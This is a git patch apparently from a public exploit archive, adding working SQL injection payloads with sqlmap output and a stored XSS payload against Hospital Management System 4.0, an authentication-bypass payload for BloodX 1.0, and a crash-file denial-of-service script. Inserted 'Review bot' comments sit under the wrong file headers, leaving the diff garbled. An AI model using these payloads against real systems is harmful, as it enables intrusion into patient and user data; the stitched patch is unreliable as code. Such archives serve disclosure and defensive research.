From 3b67743b555633b22cb2a5696536e7bff642537a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 3 Jan 2020 05:02:00 +0000
Subject: [PATCH] DB: 2020-01-03 4 changes to exploits/shellcodes MSN Password Recovery 1.30 - Denial of Service (PoC) Hospital Management System 4.0 - 'searchdata' SQL Injection Hospital Management System 4.0 - Persistent Cross-Site Scripting BloodX 1.0 - Authentication Bypass
---
exploits/php/webapps/47840.txt | 166 +++++++++++++++++++++++++++++++++
exploits/php/webapps/47841.txt | 36 +++++++
exploits/php/webapps/47842.txt | 30 ++++++
exploits/windows/dos/47839.py | 22 +++++
files_exploits.csv | 4 +
5 files changed, 258 insertions(+)
create mode 100644 exploits/php/webapps/47840.txt
create mode 100644 exploits/php/webapps/47841.txt
create mode 100644 exploits/php/webapps/47842.txt
create mode 100755 exploits/windows/dos/47839.py
diff --git a/exploits/php/webapps/47840.txt b/exploits/php/webapps/47840.txt
new file mode 100644
index 000000000..0561583d7
--- /dev/null
+++ b/exploits/php/webapps/47840.txt
@@ -0,0 +1,166 @@
+# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
+# Version: v4.0
+# Tested on: Windows
+# CVE : N/A
+
+# The Hospital Management System 4.0 web application is vulnerable to
+# SQL injection in multiple areas, listed below are 5 of the prominent
+# and easy to exploit areas.
+
+================================ 1 - SQLi ================================
+
+POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+Origin: https://10.0.0.214
+DNT: 1
+Connection: close
+Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+
+searchdata=&search=
+
+?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.
+
+POST parameter 'searchdata' is vulnerable.
+sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
+---
+Parameter: searchdata (POST)
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 11 columns
+ Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
+---
+[15:49:58] [INFO] testing MySQL
+[15:49:58] [INFO] confirming MySQL
+[15:49:58] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.4.1
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+[15:49:58] [INFO] fetching database names
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+================================ 2 - SQLi ================================
+
+GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
+sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
+---
+Parameter: viewid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 11 columns
+ Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp
+
+[15:54:21] [INFO] fetching database names
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login
+
+================================ 3 - SQLi ================================
+
+Parameter: bs (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=
+
+?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient
+
+================================ 4 - SQLi ================================
+
+POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 111
+Origin: https://10.0.0.214
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+
+patname=
+
+patname parameter is vulnerable to SQLi under the add patient in the doctor login
+
+================================ 5 - SQLi ================================
+
+---
+Parameter: cpass (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
+ Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
+---
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 38
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php
+Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
+Upgrade-Insecure-Requests: 1
+
+cpass=123&npass=123&cfpass=123&submit=123
+
+the ?cpass parameter is vulnerable to blind SQL injection
\ No newline at end of file
diff --git a/exploits/php/webapps/47841.txt b/exploits/php/webapps/47841.txt
new file mode 100644
index 000000000..82679e2be
--- /dev/null
+++ b/exploits/php/webapps/47841.txt
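Review bot: The title and the CSV description name only `searchdata`, but the body reports five injectable parameters (`searchdata`, `viewid`, `bs`, `patname`, `cpass`) across the doctor and admin roles, and section 3 never states which request path accepts `bs`, so a defender mapping these findings to handlers or WAF rules cannot place that one. Every payload shown breaks out of a single-quoted string literal, which points at the same root cause in each handler — the POST/GET value being interpolated into the MySQL query text rather than bound — and the advisory would be actionable with one remediation line such as `# Fix: use prepared statements with bound parameters in search.php, view-patient.php, add-patient.php, change-password.php and the medical-history form handler`. The `Tested on: Windows` header should say whether it describes the tester's machine or the target, since the sqlmap fingerprint below only identifies the target stack as Apache 2.4.41 / PHP 7.4.1 / MariaDB.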
@@ -0,0 +1,36 @@
+# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
+# Version: v4.0
+# Tested on: Windows
+# CVE : N/A
+
+================ 1. - Cross Site Scripting (Persistent) ================
+
+URL : http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
+Method : POST
+Parameter: doctorspecilization
+Attack :
+
+POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
+
+?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed
\ No newline at end of file
diff --git a/exploits/php/webapps/47842.txt b/exploits/php/webapps/47842.txt
new file mode 100644
index 000000000..ac809958a
--- /dev/null
+++ b/exploits/php/webapps/47842.txt
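Review bot: The advisory never says where the stored `doctorspecilization` value is rendered, which is the fact a defender needs to apply the fix at the right output point; the `</td>` / `<td>` framing of the payload suggests it is echoed inside a table cell without HTML encoding, so a line such as `# Root cause: the stored value is rendered into a table cell without output encoding — apply htmlspecialchars() (or equivalent) on output` would state the remediation. The closing sentence hedges the impact with "depending on how it's viewed" while the title asserts it is persistent, so the advisory should name the page on which the stored value was observed to render, since the request alone does not establish persistence. `doctor-specilization.php` / `doctorspecilization` appear to be the application's own spelling and should stay as written.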
@@ -0,0 +1,30 @@
+# Exploit Title: BloodX 1.0 - Authentication Bypass
+# Author: riamloo
+# Date: 2019-12-31
+# Vendor Homepage: https://github.com/diveshlunker/BloodX
+# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# Discription:
+# An standalone platform which lets donors, receivers, organizers and sponsers to merge.
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost//BloodX-master/login.php
+
+POST /BloodX-master/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 63
+Referer: http://localhost/BloodX-master/login.php
+Cookie: PHPSESSID=qusaqht0gvh0f97vbf44ep3iu
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
\ No newline at end of file
diff --git a/exploits/windows/dos/47839.py b/exploits/windows/dos/47839.py
new file mode 100755
index 000000000..965128414
--- /dev/null
+++ b/exploits/windows/dos/47839.py
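Review bot: The entry names `login.php` and a payload but gives no root cause or fix, so a reader cannot tell what to change; the `'=''or'` value sent in both `email` and `password` is a quote-breaking string, which suggests the login query interpolates the two POST values, and a line such as `# Fix: bind email and password as prepared-statement parameters instead of concatenating them into the query` would make the advisory actionable. The header misspells "Description", "A standalone" and "sponsors" (`Discription`, `An standalone`, `sponsers`) and the "Vulnerability" sentence should read "can bypass the login page and access the dashboard page". The proof-of-concept URL `http://localhost//BloodX-master/login.php` has a doubled slash that the request line below does not, which looks like a typo.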
@@ -0,0 +1,22 @@
+# Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC)
+# Date: 2020-01-02
+# Vendor Homepage: https://www.top-password.com/
+# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
+# Exploit Author: Gokkulraj
+# Tested Version: v1.30
+# Tested on: Windows 7 x64
+
+# 1.- Download and install MSN Password Recovery
+# 2.- Run python code : MSN Password Recovery.py
+# 3.- Open CRASH.txt and copy content to clipboard
+# 4.- Open MSN Password Recovery and Click 'EnterKey'
+# 5.- Paste the content of CRASH.txt into the Field: 'User Name and
+Registration Code'
+# 6.- click 'OK' you will see a crash.
+
+#!/usr/bin/env python
+Dos= "\x41" * 9000
+myfile=open('CRASH.txt','w')
+myfile.writelines(Dos)
+myfile.close()
+print("File created")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index df1679a55..140392b7d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6626,6 +6626,7 @@ id,file,description,date,author,type,platform,port
 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
+47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
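Review bot: The script does not run as committed: the step-5 comment wraps onto a bare line `Registration Code'`, which Python parses as code and rejects with a SyntaxError (unterminated string), and `#!/usr/bin/env python` is on line 17 rather than line 1, so the 100755 mode does not make the file directly executable either. Join the wrapped text back onto its `# 5.-` comment (or prefix it with `#`) and move the shebang to the first line. The manual open/writelines/close should also become `with open('CRASH.txt', 'w') as crash_file:` / `    crash_file.write("\x41" * 9000)` — `writelines` on a str iterates it character by character, which works here but is not what the name implies, and the context manager closes the file on any error.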
@@ -42143,3 +42144,6 @@ id,file,description,date,author,type,platform,port
 47834,exploits/php/webapps/47834.py,"Shopping Portal ProVersion 3.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
 47835,exploits/hardware/webapps/47835.txt,"IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal",2020-01-01,"Raif Berkay Dincel",webapps,hardware,
 47836,exploits/php/webapps/47836.py,"Hospital Management System 4.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
+47840,exploits/php/webapps/47840.txt,"Hospital Management System 4.0 - 'searchdata' SQL Injection",2020-01-02,FULLSHADE,webapps,php,
+47841,exploits/php/webapps/47841.txt,"Hospital Management System 4.0 - Persistent Cross-Site Scripting",2020-01-02,FULLSHADE,webapps,php,
+47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,